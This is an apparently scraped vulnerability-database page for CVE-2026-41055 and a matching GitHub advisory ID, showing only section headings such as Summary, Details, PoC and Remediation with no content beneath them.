Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41055 (GCVE-0-2026-41055)

FKIE_CVE-2026-41055

GHSA-793Q-XGJ6-7FRP

Summary

Affected Package

Details

PoC

Impact

Suggested Remediation

Tags

Sightings

Nomenclature